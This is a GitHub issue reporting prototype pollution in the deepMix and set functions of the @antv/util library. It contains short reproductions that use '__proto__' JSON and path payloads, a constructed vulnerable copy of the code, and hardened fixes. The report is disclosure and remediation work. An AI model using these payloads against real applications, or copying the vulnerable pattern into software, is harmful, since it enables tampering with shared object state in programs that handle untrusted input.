潜在的原型链污染漏洞 #114

Open
yllhwa opened this issue May 22, 2024 · 1 comment

Comments


yllhwa commented May 22, 2024

Reproduction 1:

let deepMix = require("@antv/util").deepMix;

let BAD_JSON = JSON.parse('{"__proto__":{"test":123}}');

let obj = {};
deepMix(obj, BAD_JSON);

console.log({}.test); // 123

Offending code:

const deepMix = function (rst: any, ...args: any[]) {
  for (let i = 0; i < args.length; i += 1) {
    _deepMix(rst, args[i]);
  }
  return rst;
};

Reproduction 2:

let set = require("@antv/util").set;

let obj = {};
set(obj, "__proto__.test", 123);

console.log({}.test); // 123

Offending code:

util/src/lodash/set.ts

Lines 5 to 29 in c499a30

/**
 * https://github.com/developit/dlv/blob/master/index.js
 * @param obj
 * @param path
 * @param value
 */
export default (obj: any, path: string | any[], value: any): any => {
  let o = obj;
  const keyArr = isString(path) ? path.split('.') : path;
  keyArr.forEach((key: string | number, idx: number) => {
    // not the last key
    if (idx < keyArr.length - 1) {
      if (!isObject(o[key])) {
        o[key] = isNumber(keyArr[idx + 1]) ? [] : {};
      }
      o = o[key];
    } else {
      o[key] = value;
    }
  });
  return obj;
};
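Added example, not part of the issue text and not the code of @antv/util: a constructed stand-in for the `set` logic quoted above (`unsafeSet`, simplified so that a numeric next segment creates an array) beside hardened `safeSet` and `safeDeepMix` variants. The hardened versions reject the `__proto__`, `constructor` and `prototype` segments up front and only descend into containers that are the current object's own properties, so the walk can never land on `Object.prototype`. `demo()` replays both reproductions from the issue, cleans up the pollution the unsafe version causes, and reports what the hardened versions leave behind. The names `UNSAFE_KEYS`, `isUnsafeKey`, `isObjectLike`, `hasOwn`, `unsafeSet`, `safeSet`, `safeDeepMix` and `demo` are assumed for illustration.

```javascript
// Added example (assumed names); not @antv/util's source.
// Segments that walk from a plain object into a shared prototype.
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function isUnsafeKey(key) {
  return UNSAFE_KEYS.has(String(key));
}

function isObjectLike(value) {
  return value !== null && typeof value === 'object';
}

function hasOwn(obj, key) {
  return Object.prototype.hasOwnProperty.call(obj, key);
}

// Vulnerable: constructed mirror of the issue's `set`. obj["__proto__"] is
// Object.prototype, which is object-like, so the walk descends into it.
function unsafeSet(obj, path, value) {
  const keys = typeof path === 'string' ? path.split('.') : path;
  let o = obj;
  keys.forEach((key, idx) => {
    if (idx < keys.length - 1) {
      if (!isObjectLike(o[key])) {
        o[key] = /^\d+$/.test(String(keys[idx + 1])) ? [] : {};
      }
      o = o[key];
    } else {
      o[key] = value;
    }
  });
  return obj;
}

// Hardened: reject unsafe segments, and only step into own properties so an
// inherited object can never become the write target.
function safeSet(obj, path, value) {
  const keys = typeof path === 'string' ? path.split('.') : path;
  for (const key of keys) {
    if (isUnsafeKey(key)) {
      throw new TypeError(`refusing to set path segment "${key}"`);
    }
  }
  let o = obj;
  keys.forEach((key, idx) => {
    if (idx < keys.length - 1) {
      if (!hasOwn(o, key) || !isObjectLike(o[key])) {
        o[key] = /^\d+$/.test(String(keys[idx + 1])) ? [] : {};
      }
      o = o[key];
    } else {
      o[key] = value;
    }
  });
  return obj;
}

// Hardened deep merge: iterate only own enumerable keys (JSON.parse makes
// "__proto__" an ordinary own key), skip unsafe ones, never recurse into an
// inherited property of the destination.
function safeDeepMix(dst, ...sources) {
  for (const src of sources) {
    if (!isObjectLike(src)) continue;
    for (const key of Object.keys(src)) {
      if (isUnsafeKey(key)) continue;
      const val = src[key];
      if (isObjectLike(val) && !Array.isArray(val)) {
        if (!hasOwn(dst, key) || !isObjectLike(dst[key])) dst[key] = {};
        safeDeepMix(dst[key], val);
      } else {
        dst[key] = val;
      }
    }
  }
  return dst;
}

// Replays the issue's reproductions and reports the state of Object.prototype.
function demo() {
  const out = {};
  unsafeSet({}, '__proto__.polluted', 123);
  out.unsafeSetPolluted = ({}).polluted;   // 123: every object now has .polluted
  delete Object.prototype.polluted;        // clean up before the hardened checks
  try {
    safeSet({}, '__proto__.polluted', 123);
    out.safeSetThrew = false;
  } catch (e) {
    out.safeSetThrew = e instanceof TypeError;
  }
  out.safeSetPolluted = ({}).polluted;     // undefined
  const merged = safeDeepMix({}, JSON.parse('{"__proto__":{"test":123},"a":{"b":1}}'));
  out.deepMixPolluted = ({}).test;         // undefined
  out.deepMixKeptOwnData = merged.a.b;     // 1
  out.deepMixHasProtoKey = hasOwn(merged, '__proto__'); // false
  return out;
}
```

Rejecting with a throw rather than silently skipping is deliberate for `set`: a caller that passed `__proto__` in a path is either attacker-controlled or buggy, and either way should not proceed as if the write succeeded. For a merge of untrusted JSON, skipping the key is the more practical choice, since the rest of the document is usually still wanted.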

@hustcc (Member)

hustcc commented May 22, 2024

Is there a way to improve it? Just send a PR directly~
